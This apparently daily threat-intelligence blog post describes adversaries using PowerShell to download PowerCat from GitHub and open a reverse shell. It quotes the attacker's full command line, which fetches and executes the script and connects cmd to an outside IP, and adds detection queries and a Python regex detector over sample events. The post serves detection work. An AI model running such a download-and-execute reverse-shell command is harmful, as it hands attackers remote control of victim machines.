328. Adversaries Use PowerCat for Reverse Shells

Hello everyone!

I've already mentioned that sometimes threat actors want to be caught. Let's look at another case and a tool I don't often see used in the wild (ITW).

According to this report, the adversary leveraged PowerShell to download and execute PowerCat - an open-source PowerShell-based Netcat utility - in order to start a reverse shell:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd

As you may have noticed, the adversary didn't rename the tool, and in many cases this is very common practice. The same can be said about the repository - threat actors often abuse PowerShell to download tools straight from official sources.

So it's another notable thing to document and build detections for, for example:

event_type: "processcreatewin" AND cmdline: "powercat"

Don't forget about script block logging - the script block also contains lots of interesting strings and function names, just check the script itself.
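To show how the command-line rule above and the script block check fit together, here is an added example (mine, not from the report or the PowerCat project) that runs both over a few constructed events. The event field names, the TEST-NET C2 address and the script block text are assumptions; the only real detail reused is the public download URL already quoted in the post.

```python
import re

# Constructed sample telemetry (not from the report): the post's process-creation
# event with the C2 address swapped for a TEST-NET placeholder, a benign PowerShell
# launch, a cradle fetching some other public script, and a script block event
# (PowerShell Operational 4104) carrying a stand-in for the downloaded script.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "cmdline": "powershell.exe -c IEX (New-Object System.Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/besimorhino/"
                "powercat/master/powercat.ps1'); powercat -c 203.0.113.10 -p 8080 -e cmd"},
    {"event_type": "processcreatewin",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\inventory.ps1"},
    {"event_type": "processcreatewin",
     "cmdline": "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString("
                "'https://raw.githubusercontent.com/example-org/tool/main/run.ps1')"},
    {"event_type": "scriptblockwin", "event_id": 4104,
     "scriptblocktext": "function powercat\n{\n  param([string]$c, [int]$p, [string]$e)\n  ...\n}"},
]

PROCESS_RULES = [
    # The post's rule: the tool name left unchanged on the command line.
    ("powercat_cmdline", re.compile(r"powercat", re.IGNORECASE)),
    # Download-and-execute cradle pulling a script straight from a public GitHub
    # repo; weaker on its own, so it is reported as a separate rule for triage.
    ("ps_github_download_cradle", re.compile(
        r"(IEX|Invoke-Expression).{0,200}DownloadString\s*\(\s*['\"]"
        r"https?://raw\.githubusercontent\.com/", re.IGNORECASE | re.DOTALL)),
]
# Script block logging sees the script body even if the file on disk is renamed.
SCRIPTBLOCK_RULES = [
    ("powercat_scriptblock", re.compile(r"function\s+powercat\b", re.IGNORECASE)),
]

def detect(events):
    """Return (event_index, rule_name) for every rule that fires, in order."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("event_type") == "processcreatewin":
            text, rules = ev.get("cmdline", ""), PROCESS_RULES
        elif ev.get("event_type") == "scriptblockwin":
            text, rules = ev.get("scriptblocktext", ""), SCRIPTBLOCK_RULES
        else:
            continue
        hits.extend((i, name) for name, rx in rules if rx.search(text))
    return hits

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event[{idx}] -> {rule}")
```

The second rule fires on the third event even though "powercat" never appears there, which is the point of pairing the name match with a cradle rule: a renamed copy still leaves the download pattern and the script block content behind.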

See you tomorrow!
